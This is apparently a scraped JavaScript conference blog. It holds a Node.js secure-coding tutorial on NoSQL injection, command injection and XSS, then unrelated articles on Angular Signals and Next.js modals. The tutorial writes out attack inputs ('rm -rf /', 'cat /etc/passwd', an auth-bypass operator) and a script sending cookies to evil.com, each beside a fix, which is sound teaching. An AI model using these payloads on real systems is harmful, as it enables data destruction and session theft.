Overview: NoSQL injection is similar to SQL injection but targets NoSQL databases like MongoDB. Attackers can manipulate queries to execute arbitrary commands.

Scenario 1: Consider a MongoDB query to find a user by username and password:

const username = req.body.username;
const password = req.body.password;

User.findOne({ username: username, password: password }, (err, user) => {
  if (err) throw err;
  // Process user
});

The Attack

If an attacker inputs { "$ne": "" } as the password, the query becomes:

User.findOne({ username: 'admin', password: { "$ne": "" } }, (err, user) => {
  if (err) throw err;
  // Process user
});

This query returns the first user where the password is not empty, potentially bypassing authentication.

Solution: To prevent NoSQL injection, sanitize user inputs and use libraries like mongo-sanitize to remove any characters that could be used in an injection attack.

const sanitize = require('mongo-sanitize');

const username = sanitize(req.body.username);
const password = sanitize(req.body.password);

User.findOne({ username: username, password: password }, (err, user) => {
  if (err) throw err;
  // Process user
});

Scenario 2: Consider a Node.js application that allows users to search for products with filtering options:

app.post('/products/search', async (req, res) => {
  const { category, sortField } = req.body;

  // VULNERABLE CODE: Directly using user input in aggregation pipeline
  const pipeline = [
    { $match: { category: category } },
    { $sort: { [sortField]: 1 } }, // Dangerous!
    { $limit: 20 }
  ];

  try {
    const products = await productsCollection.aggregate(pipeline).toArray();
    res.json(products);
  } catch (err) {
    res.status(500).json({ error: err.message });
  }
});

The Attack

An attacker could send a malicious payload:

{
  "category": "electronics",
  "sortField": "$function: { body: function() { return db.getSiblingDB('admin').auth('admin', 'password') } }"
}

This attempts to execute arbitrary JavaScript in the MongoDB server through the $function operator, potentially allowing database access control bypass or even server-side JavaScript execution.

Secure Solution

Here’s the fixed version:

app.post('/products/search', async (req, res) => {
  const { category, sortField } = req.body;

  // Validate category
  if (typeof category !== 'string') {
    return res.status(400).json({ error: "Invalid category format" });
  }

  // Validate sort field against allowlist
  const allowedSortFields = ['name', 'price', 'rating', 'date_added'];
  if (!allowedSortFields.includes(sortField)) {
    return res.status(400).json({ error: "Invalid sort field" });
  }

  // SECURE CODE: Using validated input
  const pipeline = [
    { $match: { category: category } },
    { $sort: { [sortField]: 1 } },
    { $limit: 20 }
  ];

  try {
    const products = await productsCollection.aggregate(pipeline).toArray();
    res.json(products);
  } catch (err) {
    res.status(500).json({ error: "An error occurred" });
  }
});

Key Takeaways:

  1. Validates the data type of the category parameter.
  2. Uses an allowlist approach for sortField, restricting possible values.
  3. Avoids exposing detailed error information to potential attackers.

Command Injection

Overview: Command injection occurs when an attacker can execute arbitrary commands on the host operating system via a vulnerable application. This typically happens when user input is passed directly to a system shell.

Example: Consider a Node.js application that uses the exec function to list files in a directory:

const { exec } = require('child_process');

const dir = req.body.dir;

exec(`ls ${dir}`, (err, stdout, stderr) => {
  if (err) throw err;
  // Process stdout
});

If an attacker inputs ; rm -rf /, the command becomes:

ls ; rm -rf /

This command lists the directory contents and then deletes the root directory, causing significant damage.

Solution: To prevent command injection, avoid using exec with unsanitized user input. Use safer alternatives like execFile or spawn, which do not invoke a shell.

const { execFile } = require('child_process');

const dir = req.body.dir;

execFile('ls', [dir], (err, stdout, stderr) => {
  if (err) throw err;
  // Process stdout
});

Scenario 2: Consider a Node.js application that allows users to ping a host to check connectivity:

const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {
  const hostInput = req.query.host;

  // VULNERABLE CODE: Direct concatenation of user input into command
  const command = 'ping -c 4 ' + hostInput;

  exec(command, (error, stdout, stderr) => {
    if (error) {
      res.status(500).send(`Error: ${stderr}`);
      return;
    }
    res.send(`<pre>${stdout}</pre>`);
  });
});

app.listen(3000);

The Attack

An attacker could exploit this vulnerability by providing a malicious input:

/ping?host=google.com; cat /etc/passwd

The resulting command becomes:

ping -c 4 google.com; cat /etc/passwd

This would execute the ping command followed by displaying the contents of the system’s password file, potentially exposing sensitive information. An even more destructive payload might be:

/ping?host=;rm -rf /*

Which attempts to delete all files on the system (assuming adequate permissions).

Secure Solution

Here’s how to fix the vulnerability:

const express = require('express');
const { execFile } = require('child_process');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {
  const hostInput = req.query.host;

  // Input validation: Basic hostname format check
  if (!/^[a-zA-Z0-9][a-zA-Z0-9\.-]+$/.test(hostInput)) {
    return res.status(400).send('Invalid hostname format');
  }

  // SECURE CODE: Using execFile which doesn't invoke shell
  execFile('ping', ['-c', '4', hostInput], (error, stdout, stderr) => {
    if (error) {
      res.status(500).send('Error executing command');
      return;
    }
    res.send(`<pre>${stdout}</pre>`);
  });
});

app.listen(3000);

Best Practices to Prevent Command Injection

  1. Avoid shell execution: Use execFile or spawn instead of exec when possible, as they don’t invoke a shell.
  2. Input validation: Implement strict validation of user input using regex or other validation methods.
  3. Allowlists: Use allowlists to restrict inputs to known-good values.
  4. Use built-in APIs: When possible, use Node.js built-in modules instead of executing system commands (see the sketch after this list).
  5. Principle of least privilege: Run your Node.js application with minimal required system permissions.
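To illustrate point 4 with a rough sketch of my own (not from the article): a connectivity check can often be replaced with a built-in API such as dns.promises.lookup, which never touches a shell. A DNS lookup is not a full ping, but it avoids spawning an external process entirely; the /check-host route name is hypothetical.

const dns = require('node:dns').promises;

app.get('/check-host', async (req, res) => {
  const hostInput = req.query.host;

  if (typeof hostInput !== 'string' || !/^[a-zA-Z0-9][a-zA-Z0-9.-]+$/.test(hostInput)) {
    return res.status(400).send('Invalid hostname format');
  }

  try {
    // Resolves the hostname without spawning any external process
    const { address } = await dns.lookup(hostInput);
    res.json({ host: hostInput, address, resolvable: true });
  } catch {
    res.json({ host: hostInput, resolvable: false });
  }
});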

Cross-Site Scripting (XSS) Attacks

Cross-site scripting (XSS) is a type of security vulnerability that is frequently seen in web applications. It allows attackers to inject malicious scripts into web pages that other users view. These scripts can then be executed in the context of the victim’s browser, resulting in potential data theft, session hijacking, and other malicious activities. An XSS vulnerability occurs when an application uses unvalidated input when creating a web page.

How XSS Occurs

XSS attacks happen when the attacker is able to inject malicious scripts into a web application and the scripts get executed in the victim’s browser, thus making the attacker perform actions on behalf of the user or even steal sensitive information.

How XSS Occurs in Node.js

XSS attacks can occur in Node.js applications when user input is not properly sanitized or encoded before being included in the HTML output. This can happen in various scenarios, such as displaying user comments, search results, or any other dynamic content.

Types of XSS Attacks

XSS vulnerabilities can be classified into three primary types:

  • Reflected XSS: The malicious script is reflected off a web server, such as in an error message or search result, and is immediately executed by the user’s browser.
  • Stored XSS: The malicious script is stored on the server, such as in a database, and is executed whenever the data is retrieved and displayed to users.
  • DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code, and the malicious script is executed as a result of modifying the DOM environment.

Scenario 1: Consider a Node.js application that displays user comments without proper sanitization:

const express = require('express');
const app = express();

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {
  const comment = req.body.comment;
  res.send(`<div><p>User comment: ${comment}</p></div>`);
});

app.listen(3000, () => {
  console.log('Server is running on port 3000');
});

If an attacker submits a comment containing a malicious script, such as:

<script>alert('XSS');</script>

The application will render the comment as:

<div>
  <p>User comment: <script>alert('XSS');</script></p>
</div>

When another user views the comment, the script will execute, displaying an alert box with the message “XSS”.

Prevention Techniques

To prevent XSS attacks in Node.js applications, developers should implement the following techniques:

  • Input Validation: Ensure that all user inputs are validated to conform to expected formats. Reject any input that contains potentially malicious content.
  • Output Encoding: Encode user inputs before displaying them in the browser. This ensures that any special characters are treated as text rather than executable code.
const express = require('express');
const escapeHtml = require('escape-html');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {
  const comment = escapeHtml(req.body.comment);
  res.send(`<div><p>User comment: ${comment}</p></div>`);
});

app.listen(3000, () => {
  console.log('Server is running on port 3000');
});

Here, escapeHtml is a function that converts special characters to their HTML entity equivalents.

  • Content Security Policy (CSP): Implement a Content Security Policy to restrict the sources from which scripts can be loaded. This helps prevent the execution of malicious scripts.
  • HTTP-Only and Secure Cookies: Use HTTP-only and secure flags for cookies to prevent them from being accessed by malicious scripts.
res.cookie('session', sessionId, { httpOnly: true, secure: true });

Scenario 2: Reflected XSS in a Search Feature

Here’s a simple Express application with an XSS vulnerability:

const express = require('express');
const app = express();

app.get('/search', (req, res) => {
  const searchTerm = req.query.q;

  // VULNERABLE CODE: Directly embedding user input in HTML response
  res.send(`
    <h1>Search Results for: ${searchTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

app.listen(3000);

The Attack

An attacker could craft a malicious URL:

/search?q=<script>document.location='https://evil.com/stealinfo.php?cookie='+document.cookie</script>

When a victim visits this URL, the script executes in their browser, sending their cookies to the attacker’s server. This could lead to session hijacking and account takeover.

Secure Solutions

  1. Output Encoding
const express = require('express');
const app = express();

app.get('/search', (req, res) => {
  const searchTerm = req.query.q || '';

  // SECURE CODE: Encoding special characters
  const encodedTerm = searchTerm
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');

  res.send(`
    <h1>Search Results for: ${encodedTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

2. Using Template Engines

const express = require('express');
const app = express();

app.set('view engine', 'ejs');
app.set('views', './views');

app.get('/search', (req, res) => {
  const searchTerm = req.query.q || '';

  // SECURE CODE: Using EJS template engine with automatic escaping
  res.render('search', { searchTerm });
});

3. Using Content Security Policy

const express = require('express');
const helmet = require('helmet');

const app = express();

// Add Content Security Policy headers
app.use(helmet.contentSecurityPolicy({
  directives: {
    defaultSrc: ["'self'"],
    scriptSrc: ["'self'"],
    styleSrc: ["'self'"],
  }
}));

app.get('/search', (req, res) => {
  // Even with encoding, adding CSP provides defense in depth
  const searchTerm = req.query.q || '';
  const encodedTerm = searchTerm
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');

  res.send(`
    <h1>Search Results for: ${encodedTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

Best Practices to Prevent XSS

  • Context-appropriate encoding: Encode output according to the context in which it will be used: HTML, JavaScript, CSS, or URL.
  • Use security libraries: When rendering user-supplied HTML, use libraries such as DOMPurify, js-xss, or sanitize-html (see the sketch after this list).
  • Content Security Policy: CSP headers can be used to restrict where scripts may come from and whether they can be executed.
  • Use modern frameworks: Frameworks like React, Vue, or Angular encode output by default.
  • X-XSS-Protection: This header enables the built-in XSS filter of older browsers; modern browsers have largely dropped that filter, so treat it as defense in depth at best.
  • HttpOnly cookies: Mark sensitive cookies as HttpOnly to prevent them from being accessed by JavaScript.
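A small sketch of the sanitization approach (mine, not from the article), using the sanitize-html package with a restrictive allowlist:

const sanitizeHtml = require('sanitize-html');

function cleanComment(dirty) {
  // Everything outside the allowlist (including <script>) is stripped
  return sanitizeHtml(dirty, {
    allowedTags: ['b', 'i', 'em', 'strong', 'a', 'p'],
    allowedAttributes: { a: ['href'] },
  });
}

// Example: the script tag is removed, the emphasis is kept
console.log(cleanComment('<p>Nice post! <script>alert("XSS")</script><em>Thanks</em></p>'));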

Following these practices will go a long way in ensuring that your Node.js applications are secure against XSS attacks, which are still very frequent in web applications.

Conclusion

Security requires a comprehensive approach addressing all potential vulnerabilities. We discussed two of the most common threats that affect web applications:

SQL Injection

We explained how unsanitized user input in database queries can result in unauthorized data access or manipulation. To protect your applications:

  • Instead of string concatenation, use parameterized queries.
  • Consider a secure ORM that parameterizes queries for you.
  • Validate all user inputs before processing.
  • Apply the principle of least privilege for database access.

Cross-Site Scripting (XSS)

We looked at how reflected XSS in a search feature can allow attackers to inject malicious scripts that are executed in users’ browsers. Essential defensive measures include:

  • Encoding of output where appropriate
  • Security libraries for HTML sanitization
  • Content Security Policy headers
  • Frameworks that offer protection against XSS
  • HttpOnly cookies for sensitive data.

Professional Tips for Using Signals in Angular
https://javascript-conference.com/blog/signals-angular-tips/ (05 Mar 2025)

Signals in Angular offer a powerful yet simple reactive programming model, but leveraging them effectively requires a solid understanding of best practices. In this guide, we explore expert techniques for using Signals in unidirectional data flow, integrating them with RxJS, avoiding race conditions, and optimizing performance. Whether you're new to Signals or looking to refine your approach, these professional tips will help you build seamless and efficient Angular applications.

The new Signals in Angular are a simple reactive building block. However, as is so often the case, the devil is in the detail. In this article, I will give three tips to help you use Signals in a more straightforward way. The examples used for this can be found here.

Guiding theory: Unidirectional data flow with signals

The approach for establishing a unidirectional data flow (Fig. 1) serves as the guiding theory for my three tips.

Fig. 1: Unidirectional data flow with a store

Handlers for UI events delegate to the store. I use the abstract term “intention”, since this process is different for different stores. With the Redux-based NgRx store, actions are dispatched; whereas with the lightweight NgRx Signal store, the component calls a method offered by the store.

The store executes synchronous or asynchronous tasks. These usually lead to a state change, which the application transports to the views of the individual components with signals. As part of this data flow, the state can be projected onto view models using computed, i.e. onto data structures that represent an individual use case’s view of the state.

This approach is based on the fact that signals are primarily suitable for informing the view synchronously about data and data changes. They are less suitable for asynchronous tasks and for representing events. First, they don’t offer a simple way of dealing with overlapping asynchronous requests and the resulting race conditions, and they cannot directly represent error states. Second, signals skip intermediate states in the case of directly consecutive value changes. This desired property is called “glitch free”.

For example, if a signal changes from 1 to 2 and immediately afterwards from 2 to 3, the consumer only receives a notification about the 3. This is also conducive to data binding performance, especially as updating with intermediate results would result in an unnecessary performance overhead.
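
A minimal sketch of this behavior; the component is made up purely for illustration:

import { Component, effect, signal } from '@angular/core';

@Component({ selector: 'app-glitch-demo', standalone: true, template: '' })
export class GlitchDemoComponent {
  counter = signal(1);

  constructor() {
    // Effects run asynchronously after the current tick and are glitch-free
    effect(() => console.log('counter is', this.counter()));

    this.counter.set(2);
    this.counter.set(3);
    // The effect logs "counter is 3" exactly once; the intermediate 2 is never observed.
  }
}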


Tip 1: Signals harmonize with RxJS

Signals are deliberately kept simple. That’s why they offer fewer options than RxJS, which has been established in the Angular world for years. Thanks to the RxJS interop that Angular provides, the best of both worlds can be combined. Listing 1 demonstrates this. It converts the signals originalName and englishName into observables and implements a typeahead based on them. To do this, it uses the operators filter, debounceTime and switchMap provided by RxJS. The latter prevents race conditions for overlapping requests by only using the most recent one: switchMap aborts requests that have already been started, unless they have already completed.

Listing 1

@Component({
  selector: 'app-desserts',
  standalone: true,
  imports: [DessertCardComponent, FormsModule, JsonPipe],
  templateUrl: './desserts.component.html',
  styleUrl: './desserts.component.css',
  changeDetection: ChangeDetectionStrategy.OnPush,
})
export class DessertsComponent {
  #dessertService = inject(DessertService);
  #ratingService = inject(RatingService);
  #toastService = inject(ToastService);

  originalName = signal('');
  englishName = signal('Cake');
  loading = signal(false);

  ratings = signal<DessertIdToRatingMap>({});
  ratedDesserts = computed(() => this.toRated(this.desserts(), this.ratings()));

  originalName$ = toObservable(this.originalName);
  englishName$ = toObservable(this.englishName);

  desserts$ = combineLatest({
    originalName: this.originalName$,
    englishName: this.englishName$,
  }).pipe(
    filter((c) => c.originalName.length >= 3 || c.englishName.length >= 3),
    debounceTime(300),
    tap(() => this.loading.set(true)),
    switchMap((c) =>
      this.#dessertService.find(c).pipe(
        catchError((error) => {
          this.#toastService.show('Error loading desserts!');
          console.error(error);
          return of([]);
        }),
      ),
    ),
    tap(() => this.loading.set(false)),
  );

  desserts = toSignal(this.desserts$, {
    initialValue: [],
  });
  
  […]
}

At the end, the resulting observable is converted into a signal so that the application can continue with the new Signals API. For performance reasons, the application should not switch between the two worlds too frequently.

In contrast to Figure 1, no store is used. Both the intention and the asynchronous action take place in the reactive data flow. If the data flow were outsourced to a service and the loaded data were shared with the shareReplay operator, this service could be regarded as a simple store, as sketched below. However, in line with Figure 1, even in the version shown the component hands over the execution of asynchronous tasks and receives signals at the end.
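
A hypothetical sketch of such a service; the DessertFacade name, the fixed filter, and the import path for the domain types are assumptions rather than part of the original example:

import { inject, Injectable } from '@angular/core';
import { toSignal } from '@angular/core/rxjs-interop';
import { shareReplay } from 'rxjs';
import { Dessert, DessertService } from './dessert.service'; // path assumed

@Injectable({ providedIn: 'root' })
export class DessertFacade {
  #dessertService = inject(DessertService);

  // The loaded data is shared; late subscribers receive the last result
  readonly desserts$ = this.#dessertService
    .find({ originalName: '', englishName: 'Cake' })
    .pipe(shareReplay({ bufferSize: 1, refCount: true }));

  // Consumers read the data as a signal
  readonly desserts = toSignal(this.desserts$, { initialValue: [] as Dessert[] });
}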


RxJS in Stores

RxJS is also frequently used in stores, for example in NgRx in combination with Effects. The NgRx Signal Store, in turn, offers its own reactive methods that can be defined with rxMethod (Listing 2).

Listing 2

export const DessertStore = signalStore(
  { providedIn: 'root' },
  withState({
    filter: {
      originalName: '',
      englishName: 'Cake',
    },
    loading: false,
    ratings: {} as DessertIdToRatingMap,
    desserts: [] as Dessert[],
  }),
  […]
  withMethods(
    (
      store,
      dessertService = inject(DessertService),
      toastService = inject(ToastService),
    ) => ({
      
      […]
      loadDessertsByFilter: rxMethod<DessertFilter>(
        pipe(
          filter(
            (f) => f.originalName.length >= 3 || f.englishName.length >= 3,
          ),
          debounceTime(300),
          tap(() => patchState(store, { loading: true })),
          switchMap((f) =>
            dessertService.find(f).pipe(
              tapResponse({
                next: (desserts) => {
                  patchState(store, { desserts, loading: false });
                },
                error: (error) => {
                  toastService.show('Error loading desserts!');
                  console.error(error);
                  patchState(store, { loading: false });
                },
              }),
            ),
          ),
        ),
      ),
    }),
  ),
  withHooks({
    onInit(store) {
      const filter = store.filter;
      store.loadDessertsByFilter(filter);
    },
  }),
);

This example sets up a reactive method loadDessertsByFilter in the store. As it is defined with rxMethod, it receives an observable. The values of this observable pass through the defined pipe. Because rxMethod automatically subscribes to this observable, the application code must receive the result of the data flow using tap or tapResponse. The latter is an operator from the @ngrx/operators package that combines the functionality of tap, catchError and finalize.

The consumer of a reactive method can pass a corresponding observable as well as a signal or a specific value. The onInit hook shown passes the filter signal. This means all values that the signal gradually picks up pass through the pipe in loadDessertsByFilter. This is where the glitch-free property comes into play.
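
To illustrate these three call forms, here is a hypothetical consumer; the concrete filter value and the observable filter$ are made-up examples, and inject has to run in an injection context:

const store = inject(DessertStore);

// 1. A concrete value is processed exactly once
store.loadDessertsByFilter({ originalName: '', englishName: 'Cake' });

// 2. A signal: every value the signal takes on runs through the pipe
store.loadDessertsByFilter(store.filter);

// 3. An observable: every emission runs through the pipe
store.loadDessertsByFilter(filter$);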

It is interesting to note that rxMethod can also be used outside the signal store by design. For example, a component could use it to set up a reactive method.

Tip 2: Avoiding race conditions

Overlapping asynchronous operations usually lead to undesirable race conditions. If users search for two different desserts in quick succession, both results are displayed one after the other. One of the two only flashes briefly before the other replaces it. Because the requests are asynchronous, the order in which the results arrive doesn’t have to match the order of the search queries.

To prevent this confusing behavior, RxJS offers a few flattening operators:

  • switchMap
  • mergeMap
  • concatMap
  • exhaustMap

These operators differ in how they deal with overlapping requests. The switchMap only deals with the last search request. It cancels any queries that are already running when a new query arrives. This behavior corresponds to what users intuitively expect when working with search filters.

The mergeMap and concatMap operators execute all requests: the former in parallel and the latter sequentially. The exhaustMap operator ignores further requests as long as one is running. These options are another reason for using RxJS and for the RxJS interop and rxMethod.
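
For instance, exhaustMap is a natural fit for a save button that should ignore further clicks while a request is still running. The following fragment is only a hypothetical sketch: saveClicks$, the save method, and the dessert signal are assumptions, not part of the example application:

saveClicks$ = new Subject<void>();

constructor() {
  this.saveClicks$
    .pipe(
      // Ignore clicks that arrive while a save request is still in flight
      exhaustMap(() => this.#dessertService.save(this.dessert())),
      takeUntilDestroyed(),
    )
    .subscribe(() => this.#toastService.show('Saved!'));
}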

Another strategy often used in addition or as an alternative is a flag that indicates if the application is currently communicating with the backend.

Listing 3

loadRatings(): void {
  patchState(store, { loading: true });

  ratingService.loadExpertRatings().subscribe({
    next: (ratings) => {
      patchState(store, { ratings, loading: false });
    },
    error: (error) => {
      patchState(store, { loading: false });
      toastService.show('Error loading ratings!');
      console.error(error);
    },
  });
},

Depending on the flag’s value, the application can display a loading indicator or deactivate the respective button. The latter is counterproductive, or even impossible, in a highly reactive UI that manages without an explicit button.

Tip 3: Signals as triggers

As mentioned earlier, Signals are especially suitable for transporting data to the view, like what’s seen on the right in Figure 1. Real events, UI events, or events represented with RxJS are the better solution for transmitting an intention. There are several reasons why: First, Signals’ glitch-free property can reduce consecutive changes to the last change.

Second, consumers must subscribe to the Signal in order to react to value changes. This requires an effect that triggers the desired action and writes the result to a signal. Effects that write to Signals are not welcome. By default, they are even penalized by Angular with an exception. The Angular team wants to avoid confusing reactive chains – changes that lead to changes, which, in turn, lead to further changes.

On the other hand, Angular is converting more and more APIs to signals. One example is Signals that can be bound to form fields or Signals that represent passed values (inputs). In most cases, you could argue that instead of listening for the Signal, you can also use the event that led to the Signal change. But in some cases, this is a detour that bypasses the new signal-based APIs.

Listing 4 shows an example of a component that receives the ID of a data set to be displayed as an input signal. The router takes this ID from a routing parameter. This is possible with the relatively new feature withComponentInputBinding.

Listing 4

@Component({ […] })
export class DessertDetailComponent implements OnChanges {

  store = inject(DessertDetailStore);

  dessert = this.store.dessert;
  loading = this.store.loading;

  id = input.required({
    transform: numberAttribute
  });
  
  […]
}

This component’s template lets you scroll between the data records. This logic is deliberately implemented very simply for this example:

<button [routerLink]="['..', id() + 1]" >
  Next
</button>

When scrolling, the input signal id receives a new value. Now, the question arises as to how to trigger the loading of the respective data set in the event of this kind of change. The classic procedure is using the lifecycle hook ngOnChanges:

ngOnChanges(): void {
  const id = this.id();
  this.store.load(id);
}

For the time being, there’s nothing wrong with this. However, the planned signal-based components will no longer offer this lifecycle hook. The RFC proposes using effects as a replacement.

To escape this dilemma, an rxMethod (e.g. offered by a signal store) can be used:

constructor() {
  this.store.rxLoad(this.id);
}

It should be noted that the call in the constructor passes the entire signal and not just its current value. The rxMethod subscribes to this Signal and forwards its values to an observable that is used within the rxMethod.

If you don’t want to use the signal store, you can instead use the RxJS interop discussed above and convert the signal into an observable with toObservable.
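
A rough sketch of that variant; the findById call and the writable dessert signal are assumptions used only for illustration:

#dessertService = inject(DessertService);
dessert = signal<Dessert | undefined>(undefined);

constructor() {
  toObservable(this.id)
    .pipe(
      // Load the matching data set whenever the id input changes
      switchMap((id) => this.#dessertService.findById(id)),
      takeUntilDestroyed(),
    )
    .subscribe((dessert) => this.dessert.set(dessert));
}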

If you don’t have a reactive method to hand, you might be tempted to define an effect for this task:

constructor() {
  effect(() => {
    this.store.load(this.id());
  });
}

Unfortunately, this leads to the exception in Figure 2.

Fig. 2: Error message when using effect

This problem arises because the entire load method, which writes to a Signal in the store, is executed in the reactive context of the effect. This means that Angular recognizes an effect that writes to a Signal, which is prevented by default for the reasons above. It also means that Angular triggers the effect again whenever a Signal read inside load changes.

Both problems can be prevented by using the untracked function (Listing 5).

Listing 5

constructor() {
  // try to avoid this
  effect(() => {
    const id = this.id();
    untracked(() => {
      this.store.load(id);
    });
  });
}

With this common pattern, untracked ensures that the reactive context does not spill over to the load method. load can write to Signals, and the effect doesn’t register for the Signals that load reads. Angular only triggers the effect again when the Signal id changes, because id is the only Signal read outside of untracked.

Unfortunately, this code is not especially easy to read. It’s a good idea to hide it behind a helper function:

constructor() {
  explicitEffect(this.id, (id) => {
    this.store.load(id);
  });
}

The auxiliary function explicitEffect receives a signal and subscribes to it with an effect. The effect invokes the passed lambda expression inside untracked (Listing 6).

Listing 6

import { Signal, effect, untracked } from "@angular/core";

export function explicitEffect<T>(source: Signal<T>, action: (value: T) => void) {
  effect(() => {
    const s = source();
    untracked(() => {
      action(s)
    });
  });
}

Interestingly, the explicit definition of the Signals to be tracked corresponds to the standard behavior of effects in other frameworks, like Solid. The combination of effect and untracked shown is also used in many libraries. Examples include the classic NgRx store, the RxJS interop mentioned above, the rxMethod, or the open source library ngxtension, which offers many extra functions for Signals.


To summarize

RxJS and Signals harmonize wonderfully together and the RxJS interop from Angular gives us the best of both worlds. Using RxJS is recommended for representing events. For processing asynchronous tasks, RxJS or stores (which can be based on RxJS) are recommended. The synchronous transport of data to the view should be handled by Signals. Together, RxJS, stores, and Signals are the building blocks for establishing a unidirectional data flow.

The flattening operators in RxJS can also elegantly avoid race conditions. Alternatively or in addition to this, flags can be used to indicate if a request is currently in progress at the backend.

Even if Signals weren’t primarily created to represent events, there are cases when you want to react to changes in a Signal. This is the case with framework APIs based on Signals. In addition to the RxJS interop, the rxMethod from the Signal Store can also be used. Another option is the effect/untracked pattern for implementing effects that only react to explicitly named Signals.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
Shareable Modals in Next.js: URL-Synced Overlays Made Easy https://javascript-conference.com/blog/shareable-modals-nextjs/ Mon, 17 Feb 2025 14:03:07 +0000 https://javascript-conference.com/?p=107476 Modals are a cornerstone of interactive web applications. However, managing their state, making them shareable, and preserving navigation can be complex. Next.js simplifies this with intercepting and parallel routes, enabling deep-linked, URL-synced modals. Together, we’ll build a dynamic feedback modal system with TailwindCSS that can be accessed, shared, and navigated effortlessly, improving both user experience and developer productivity.

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
Modals are essential UI components in web applications, often used for tasks such as displaying additional information, capturing user input, or confirming actions. However, traditional approaches to managing modals present challenges such as maintaining state, handling navigation, and ensuring that context is preserved on refresh.

With Next.js, intercepting and parallel routes introduce a powerful way to make modals URL-synced and shareable. This enables seamless deep linking, backward navigation to close modals, and forward navigation to reopen them – all without compromising the user experience.

In this article, we’ll walk through the process of building a dynamic feedback modal in Next.js. Along the way, we’ll explore advanced techniques, accessibility best practices, and tips for improving your modals for production-ready applications.

Why shareable modals matter

Modals have become an essential feature of modern web applications. Whether it’s a login form, product preview, or feedback submission, modals allow users to interact with your application without leaving the current page. But as simple as modals may seem, traditional implementations can present significant challenges for both users and developers.

Challenges with traditional modals

1. State management in large applications:

Most modal implementations rely on the client-side state to keep track of whether the modal is open or closed. In small applications, this is manageable using tools like React’s “useState” or the Context API. However, in larger applications with multiple modals, this approach becomes complex and error-prone. For example:

  • You may need to manage overlapping modal states across different components.
  • Global state management solutions such as Redux or Zustand can help, but add unnecessary complexity for something as simple as opening or closing a modal

2. Refresh behaviour:

Traditional modals lose their state when the page is refreshed. For example:

  • A user clicks a “Give Feedback” button, opening a modal.
  • They refresh the page, expecting the modal to stay open, but instead, it closes because the client-side state is reset. This disrupts the user experience, forcing users to repeat actions or lose their place in the workflow.

3. Inability to share modal states via URLs:
Consider a scenario where a user wants to share a particular modal with a colleague. With traditional client-side modals, there’s no URL representing the modal state, so the user can’t share or bookmark the modal. This makes the application less versatile and harder to navigate for users who expect modern, shareable interfaces.

How Next.js solves these challenges

Next.js provides a routing system that integrates seamlessly with modals, solving the challenges above. By leveraging features like intercepting routes and parallel routes, you can implement modals that are URL-synced, shareable, and persistent.

1. URL-based state for deep linking:
In Next.js, modal states can be tied directly to URLs. For example:

  • Navigating to /feedback can open a feedback form modal.
  • This URL can be shared or bookmarked, and refreshing the page will keep the modal open.
    This is achieved by associating modal components with specific routes in your file system, giving the modal a dedicated URL.

2. Preserving context and consistent navigation:
Unlike traditional modals, Next.js maintains navigation consistency. For example:

  • Pressing the back button closes the modal instead of navigating to the previous page.
  • Navigating forward reopens the modal, maintaining the user flow.
    These behaviours are automatically handled by Next.js’ routing system, reducing the need for custom logic and improving the user experience.


Next.js functions for creating shareable modals

Intercepting routes

Intercepting routes in Next.js allows you to “intercept” navigation to a specific route and render additional UI, such as a modal, without replacing the current page content. This is done using a special folder naming convention in your file system.

Implementation:

Intercepting route folder:

  • To create an interception route, use a folder prefixed with (.).
  • For example, if you wanted to intercept navigation to “/feedback” and display it as a modal, you would create the following structure:
  • app
    ├── @modal
    │   ├── (.)feedback
    │   │   └── page.tsx
    │   └── default.tsx
    └── feedback
        └── page.tsx
  • app/feedback/page.tsx renders the full-page version of the feedback form.
  • app/@modal/(.)feedback/page.tsx renders the modal version.

Route behaviour:

  • Navigating directly to /feedback will render the full page (app/feedback/page.tsx).
  • Clicking on a “Give Feedback” button navigates to /feedback, but renders the modal (app/@modal/(.)feedback/page.tsx).

Example modal file:

Listing 1: 

import { Modal } from '@/components/modal';  
export default function FeedbackModal() {  
  return (  
    <Modal>  
      <h2 className="text-lg font-bold">Give Feedback</h2>  
      <form className="mt-4 flex flex-col gap-4">  
        <textarea  
          placeholder="Your feedback..."  
          className="border rounded-lg p-2"  
        />  
        <button  
          type="submit"  
          className="bg-blue-500 text-white py-2 px-4 rounded-lg"  
        >  
          Submit  
        </button>  
      </form>  
    </Modal>  
  );  
}  

Parallel routes

Parallel routes allow multiple routes to be rendered simultaneously in different “slots” of the UI. This feature is particularly useful for rendering modals without disrupting the main layout.

Implementation:

Create a slot:

  • Parallel routes are implemented using folders prefixed with @. For example, @modal defines a slot for modal content.
  • In the root layout, you can include the modal slot next to the main page content.

Example layout file:

Listing 2:

// app/layout.tsx
import "./globals.css";

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>
        <div>{modal}</div>
        <main>{children}</main>
      </body>
    </html>
  );
}

Fallback content:

  • Define a default.tsx file in the @modal folder to specify the fallback content when the modal is not active.

Listing 3:

// app/@modal/default.tsx
export default function Default() {
  return null; // No modal by default
}

 

Why these features matter

Intercepting routes in Next.js enable dynamic modal rendering without disrupting the layout of the main application. They allow you to associate specific modal components with their own URLs, making it possible to implement deep linking and sharing for modals. This ensures that users can navigate directly to a specific modal or share its state via a URL.

Parallel routes, on the other hand, separate the rendering logic of modals from the rest of the application. By isolating modal behaviour into its own designated slot, parallel routes simplify development and improve maintainability. This separation ensures that modals can be rendered independently, without interfering with the layout or functionality of other parts of the application.

By combining intercepting and parallel routes, Next.js transforms the way modals are implemented. These features make modals more user-friendly by supporting modern navigation patterns and sharing capabilities, while also enhancing developer efficiency through cleaner, more modular code.


